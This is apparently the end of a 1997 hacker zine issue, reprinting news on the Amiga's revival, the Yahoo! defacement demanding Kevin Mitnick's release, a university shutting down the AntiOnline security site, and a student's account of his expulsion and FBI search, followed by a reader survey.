(c)1993-97 Wired Ventures, Inc.
_____________________________________________________________

Sixth Coming
by Stephen Jacobs

1.Dec.97 -- The Commodore Amiga, dubbed "the world's first multimedia PC" by
Byte, is back again. Developed by Hi-Toro, then sold to Commodore, the
computer hit the streets in late 1985 and met its first public demise with
the death of Commodore in 1994.

Though the system disappeared from the mainstream, Amiga owners have kept the
machine alive in a quasi-underground market. Meanwhile, the German clone
manufacturer that bought the OS promptly went bankrupt, and after two deals
fell through sold the technology to Gateway 2000 last March. When Amiga
Inc.'s Darreck Lisle subsequently began popping up in several user groups,
predictions of another "second coming" including PDAs and set-top boxes based
on the venerable OS spread quickly around the Net. Gateway did not respond to
the buzz, choosing to keep quiet until DevCon, a gathering of professional
developers at the Midwest Amiga Exposition in November. Even if this revival
fails, the faithful know the Amiga still has several lives to go.

This article originally appeared in the December issue of Wired magazine.

To subscribe to Wired magazine, send email to subscriptions@wired.com, or
call +1 (800) SO WIRED.

(c)1993-97 Wired Ventures, Inc.
_____________________________________________________________

Hackers break into Yahoo!, call for release of Mitnick
December 9, 1997

NEW YORK (AP) -- Hackers broke into Yahoo!, the Internet's most popular
site, demanding the release of an imprisoned comrade and threatening to
unleash a crippling computer virus if he is not freed.

Computer security experts were skeptical of the hackers' claim that they had
implanted such a virus.

The hackers, calling themselves PANTS/HAGIS, got into Yahoo!'s World Wide Web
site at about 10 p.m. Monday, leaving a digital ransom note.

"For the past month, anyone who has viewed Yahoo's page & used their search
engine, now has a logic bomb/worm implanted deep within their computer,"
it
read. "On Christmas Day, 1998, the logic bomb part of this 'virus' will
become active, wreaking havoc upon the entire planet's networks.

"
The virus can be stopped. But not by mortals."

The note said an "
antidote" program will be made available if hacker Kevin
Mitnick is released. Mitnick was indicted last year on charges involving a
multimillion-dollar crime wave in cyberspace.

Diane Hunt, a spokeswoman for the company, said the message was up for only
10 to 15 minutes and a few thousand people saw it.

"
We immediately took action to see the extent of the damage and moved to
correct it," she said. "And about that virus? There is, in fact, no virus."

Yahoo! is a computer directory widely used for searching the Internet. The
note appeared briefly in place of the Yahoo! home page, preventing people
online from using the search engine, which got 17.2 million visits in
October.

Jonathan Wheat, manager of the Anti-Virus Lab at the National Computer
Security Association, said it is at least theoretically possible to exploit
security flaws on the Internet and implant such a virus. But he said he
doubts this group of hackers -- already known to security experts -- pulled
it off.

"
That's pretty much ridiculous," agreed Jamonn Campbell, an information
security analyst at the association.

Wheat said there was little reason to be concerned that the popular Web site
was hacked.

"
A lot of Web sites get hacked constantly," he said. He said that while
Yahoo! is a high-profile site and should be expected to have better security
than most, "
no site is completely hack-proof."

(c)1997 The Associated Press.
_____________________________________________________________

University Kills Students' Security Site

by Steve Silberman

Two University of Pittsburgh computer-science majors have been abruptly
barred from accessing the Net by campus officials, physically banned from all
the college's computing labs, ordered not to contact the staff member who
shut down their access, and threatened with expulsion.

Their offense? Building a free online resource for those on the
cutting edge of computer-security issues, the students say.

Last Friday, freshmen John Vranesevich and Rob Dailey found that the
Ethernet connection in their dorm room had been disabled. Assuming that their
site, AntiOnline, was being subjected to a denial-of-service attack from some
hacker targeting a site devoted to protecting others from malicious hacks,
the two began the usual drill of reinstalling TCP/IP software and "
pinging
out" to verify their connection to the Net at large.

After working nearly all night, they found a message on their voice
mail from Lee Bannister, coordinator of residential computer services at the
university. Bannister's message: Their Ethernet access had been terminated
for violations of Pitt's code of responsibility for use of on-campus
computing resources.

Bannister also said AntiOnline violated rules prohibiting use of
campus facilities "
for purposes other than research or instructional
purposes." The code also prohibits use of campus server space and bandwidth
"
for commercial purposes or commercial gain," and bans hacking or any
activity that "
interferes with the operation of the university's technical
resources by deliberately attempting to degrade or disrupt resource
performance, security, or administrative operation."

Vranesevich and Dailey assert that research and instruction were the
very things they were offering at AntiOnline, which Vranesevich launched when
he was in 10th grade. They also point out that AntiOnline was completely
non-commercial, with no fees, no ads, and no banners. Content was closely
monitored, Vranesevich says, to prevent posting of inappropriate materials
such as porn or "
warez" (which can include pirated software or cracking
programs). To those interested in computer-security issues, the site offered
free Net access, email, and space on Vranesevich's server, Dailey said, in
hopes that even the uninitiated could learn from the experts.

"
It was educational," Dailey said, "so that even people who were new
to all this could learn to protect themselves."

AntiOnline was a crucial resource for Net security news, said
"
RLoxley," who operates the "hackphreak" channel on IRC and is the webmaster
of another hackproofing resource, X-Treme. "
If you wanted to know what the
latest exploit [operating-system defect] was, and you wanted to patch it, you
went to that site - bottom line," he said.

Vranesevich claimed that the hacker assaults on AntiOnline - which he
admitted numbered in the "
hundreds" - were no threat to the campus computing
system as a whole. "
They were smart attacks" aimed specifically at his site,
"
nothing that would degrade a network this size," Vranesevich explained. He
also noted the campus network is heavily firewalled.

AntiOnline was one of the first sites to examine a security hole in
the Windows operating system that surfaced in Spain as "
Muerte" - ported into
English as the infamous WinNuke bug. Vranesevich was inspired to create a
site devoted to security issues, he said, when a bank of NeXT computers at
his high school in Beaver, Pennsylvania, was used as a telnet "
bounce point"
to gain access to a protected computer at NASA.

While still a sophomore in high school, Vranesevich and a friend
negotiated with the Beaver Chamber of Commerce to, as he puts it, "
get the
whole town online." The two spun out Web pages for local merchants - netting
themselves US$3,000 each for a summer's work - and schmoozed the town library
and the Beaver Area School District into installing free machines in the
library and free dialup access to the Net for local residents. By the time
Vranesevich got AntiOnline up and running in his tower room at the
University of Pittsburgh, he said, it was a very popular site.

On Tuesday, Vranesevich and Dailey found an ISP willing to host a
page about their plight, and the two posted Bannister's phone number and
email address on the page, and on IRC, with a plea for statements of support.

Later that day, their email and shell accounts were shut down, their
dialup access to the Net was cut off, and the two were informed that they
would be subject to more serious charges, to be specified at a later date. On
Thursday morning, they received a "
no-contact order" from the assistant
vice-chancellor for student affairs, forbidding them from communicating with
Bannister by email or phone, even "
through any intermediary, including
users of AntiOnline.com or other Internet users at large, or similar types of
association." Should any such contact occur, the letter warned, the freshmen
would be "
subject to disciplinary sanctions up to and including dismissal
from the university."

"
They expect us to tell anyone who's ever been on AntiOnline to not
email him," Vranesevich said, "when we have no access to the Internet
whatsoever."

Bannister refused to talk to the press, but university director of
communications Ken Service said that "
it was felt that the use of the site
was in violation of the policy" the students signed at the beginning of the
semester. Service declined to discuss the details of the case, citing student
confidentiality. But as to the further charges, Service said "
the kindliest
version of it is that they seemed to have been encouraging harassment" of
Bannister by posting his email and phone number on the Net.

The case will go to the campus judicial board this afternoon. (11/21/97)

(c)1993-97 Wired Ventures, Inc.
_____________________________________________________________

Deprave
Freshman at XXXXXX University
Texas

Early September, Renee Moore, dean of student life called me in regarding the
computer system having problems, and it continually going down. She
requested a meeting between me, her, and Matin, on of the heads of the
computer systems department. They informed me that my login had been used
during the incident as well as a couple of other peoples'. I reminded them

that I had constantly requested that my account be fixed because I was never
able to log in. Through visits, in which I did sign in to the lab, I talked
to deskworkers as well as the heads of Information Systems, requesting
information regarding my account. I also had electronic communication with
them through email. I had sent email through Tommy Newman's account with
his permission. They never fixed it, so I went ahead and temporarily used
my parents America Online. I volunteered my computer for their perusal to
verify that my system was not used. They accepted and proceeded to search
through it. Nothing was found in their search, and this was recorded in the "
case's" record. After that meeting, Renee Moore requested
another meeting so that we could discuss the findings and the facts. At this
meeting, she disclosed to me that they had found no direct evidence that it
had been me doing the damage. To the question, "
Is this over with?", she
responded, "
Yes."
The next incident was at my school's computer lab. On this occasion,
I had gone into the lab in order to visit a friend of mine named
Anthony. The only time I touched the computer was to briefly look at
a site that he showed me at Hotmail, plus a few other miscellaneous
sites that I don't remember. He saw that I never once logged into the
computer system and can verify that. After that, two student workers,
not staff, came in and asked for my identification, saying,
"
Cmon Colin, we know what you were doing.......we had someone outside
the building looking in from the window that had seen you doing
something." When I asked them, "What is is it that you think that I
was doing, they responded, "We don't know yet, but you know what you
were doing, and if any damage was done, we will contact you."
I said,
"fine. I wasn't doing anything, and you all know that if you were
watching me."
They told Renee Moore that they had to kick me out of
the computer lab. The fact is, and can be verified by witnesses,
that I left approximately 15-20 minutes later on my own, and that I was never
asked to leave.
They never attempted to contact me. Instead, on Friday, December 12,
1996, three FBI agents, Mathew Grief (another dean of student life)
and one of the people in Information Systems came into my room. The
FBI agents had a search warrant that gave them the right to
confiscate my computer and everything having to do with it. They
never charged me with anything, and never read me my rights. After
about 20 minutes of going through my personal belongings, they told
me that they were going to ask me some questions. Their first
question regarded the September incident. At that point, I did not
answer and told them that I would prefer to have an attorney or some
form of representation present. They said that that was fine and
continued searching. The ordeal ended with their leaving with my
possessions, stating that they would be in contact with me.
The final exchange took place in the office of Renee Moore. This
invoved her informing me that they had expelled me. When I asked her
why the FBI had been called, she referred to the incident with the
computer lab. She had been told that I was asked to leave, when I
had not been. She told my parents on the phone that Jack had been
called, which was true, he had been, but that he had been called and
came and had talked to me. The computer lab people are having a
problem sticking to one story and are telling different people
different things.

Things on my computer:

passwd file: I got this from April, one of the desk workers, through her
login and password when she said that she had been having problems logging
into her email account.

cracked passwords: I ran a cracker on these in order to help her. The cracker
does other accounts too by itself. I did not target any of them.

source code: I had this for my own reference. They cannot be used from
Windows 95. I do not have a LINUX partition, so these cannot be used locally.
I had my programming books confiscated. I had been trying to learn some
programming.


[Reader Survey..........................................................Staff]

[This survey is designed to help us better suit our magazine to the reader,
or we may just be trying to get a good laugh, but we haven't decided yet.]

Nick:
M/F:
Age:
Occupation/grade:
City:
State/Province:
Zip Code:
Country:
Area Code:

Why do you read The HAVOC Technical Journal?

Where did you get this issue?

Are you a subscriber to THTJ?

What other zines do you read on a regular basis?




What would you like to see in future issue of THTJ?



What would you add or subtract from THTJ's format and articles?



On a scale of 1-10 ( 1 being lowest, 10 being highest), how would you rate
The HAVOC Technical Journal?


Any extra comments?





Please send all replies to scud@thtj.com

Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: [ ] Do not check this box! ³
ú-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

For office use only:

[ ]D [ ]X [ ]W [ ]Y [ ]0 [ ]1 [ ]0 [ ]1
(don't ask, we don't have a clue what this is for)

[Fin....................................................................scud_]

Well, once again thank you for reading this fine issue of thtj. Tune in next
month, same bat time, same bat channel! While you are waiting to read the
next issue, why dont you send us some mail, or fill out the reader survey, or
better yet, write an article for thtj?
scud_ <scud@thtj.com>


← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT